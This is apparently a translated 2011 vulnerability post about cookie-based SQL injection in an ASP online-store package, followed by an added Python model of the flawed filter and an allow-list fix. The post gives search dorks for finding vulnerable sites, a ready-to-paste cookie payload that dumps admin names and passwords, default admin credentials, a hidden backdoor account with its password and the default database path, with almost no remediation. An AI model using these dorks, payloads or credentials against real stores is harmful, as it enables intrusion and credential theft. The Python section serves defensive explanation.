################################################################################
#
# Title: Cookie injection vulnerability in an ASP online store
# Time: 2011-09-25
# Team: makebugs
# Author: Qingtian Xiaozhu
################################################################################
PS: comments welcome ~!
Keyword: inurl:sort.asp?sort_id=
Or inurl:pinpai.asp?pinrule_id=
Code:
' Preliminary check of form data for attack strings
Form_Badword = "%20or%20|'|""|%|update|select|delete|insert|java|script|exec|cmd|shell|count|mid|char|drop|master|from|net%20user|/add|iframe"
If Request.Form <> "" And uBits = "" Then    ' uBits is set elsewhere in the application
    Chk_badword = Split(Form_Badword, "|")
    For Each name In Request.Form
        For i = 0 To UBound(Chk_badword)
            If InStr(LCase(Request.Form(name)), Chk_badword(i)) <> 0 Then
                Showerr "e"
            End If
        Next
    Next
End If
' Preliminary check of query-string parameters for attack strings
Query_Badword = "%20or%20|'|""|%|update|=|select|delete|insert|java|script|exec|cmd|shell|count|mid|char|drop|master|from|net%20user|/add|iframe"
If Request.QueryString <> "" Then
    Chk_badword = Split(Query_Badword, "|")
    For Each Query_Name In Request.QueryString
        For i = 0 To UBound(Chk_badword)
            If InStr(LCase(Request.QueryString(Query_Name)), Chk_badword(i)) <> 0 Then
                Showerr "e"
            End If
        Next
    Next
End If
http://www.bkjia.com/sort.asp?sort_id=1
// Request.Cookies is never checked, you know.
Exp:
javascript:alert(document.cookie="sort_id="+escape("1 and 1=2 union select 1,admin_name,admin_pass,6,7 from ad_admin"))
The admin back end can back up the database, you know ~!!!!!
If you need to use nc for this and don't know how, see http://www.bkjia.com/Article/201106/92845.html
The default admin account/password is admin / admin888.
There is also a hidden account: swit / xuxinyao999
Backdoor?
Default database path: Database/shopdata.mdb
Fix: the same old problem.
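As an added illustration (not code from the page or from the store software), a Python model of the filter above: it transcribes the page's Query_Badword list, reproduces Classic ASP's Request(name) lookup order (QueryString, then Form, then Cookies), shows that a value arriving in a cookie is never screened, and contrasts an allow-list check that accepts sort_id only as an integer whatever collection it came from. The request dictionaries and the "Discount from shop" string are constructed sample input.

```python
import re
from typing import Optional

# Blacklist transcribed from the page's Query_Badword string, split on "|".
QUERY_BADWORD = ("%20or%20|'|\"|%|update|=|select|delete|insert|java|script|exec|cmd"
                 "|shell|count|mid|char|drop|master|from|net%20user|/add|iframe").split("|")

def blacklist_hit(value: str) -> bool:
    """Port of the page's InStr(LCase(value), badword) <> 0 test."""
    value = value.lower()
    return any(bad in value for bad in QUERY_BADWORD)

def legacy_filter(request: dict) -> bool:
    """Models the original guard: only Form and QueryString are inspected;
    Request.Cookies is never looked at. Returns True when the request is blocked."""
    for source in ("form", "query"):
        if any(blacklist_hit(v) for v in request.get(source, {}).values()):
            return True
    return False

def legacy_lookup(request: dict, name: str) -> Optional[str]:
    """Classic ASP's Request(name) searches QueryString, then Form, then Cookies,
    so a cookie supplies the value when the parameter is absent elsewhere."""
    for source in ("query", "form", "cookie"):
        if name in request.get(source, {}):
            return request[source][name]
    return None

def hardened_lookup(request: dict, name: str) -> Optional[int]:
    """Allow-list check: sort_id must be a short decimal integer, whichever
    collection it came from; the caller then binds it as a query parameter."""
    raw = legacy_lookup(request, name)
    if raw is None or not re.fullmatch(r"\d{1,9}", raw):
        return None
    return int(raw)

# Constructed sample requests (not captured traffic): the page's union payload
# delivered in a cookie, and a benign request carrying sort_id=1 in the URL.
PAYLOAD = "1 and 1=2 union select 1,admin_name,admin_pass,6,7 from ad_admin"
COOKIE_ATTACK = {"query": {}, "form": {}, "cookie": {"sort_id": PAYLOAD}}
QUERY_ATTACK = {"query": {"sort_id": PAYLOAD}, "form": {}, "cookie": {}}
NORMAL = {"query": {"sort_id": "1"}, "form": {}, "cookie": {}}

if __name__ == "__main__":
    print("cookie attack blocked by legacy filter:", legacy_filter(COOKIE_ATTACK))        # False
    print("value reaching the SQL:", legacy_lookup(COOKIE_ATTACK, "sort_id"))
    print("query attack blocked by legacy filter:", legacy_filter(QUERY_ATTACK))          # True
    print("hardened lookup on cookie attack:", hardened_lookup(COOKIE_ATTACK, "sort_id"))  # None
    print("hardened lookup on normal request:", hardened_lookup(NORMAL, "sort_id"))       # 1
    # Blacklists also reject legitimate text containing "count" or "from":
    print("benign text flagged:", blacklist_hit("Discount from shop"))                    # True
```

The same integer check applied to every collection, plus a parameterised query, is what the page's "fix" amounts to; the last line shows why a keyword blacklist is a poor substitute even where it is applied.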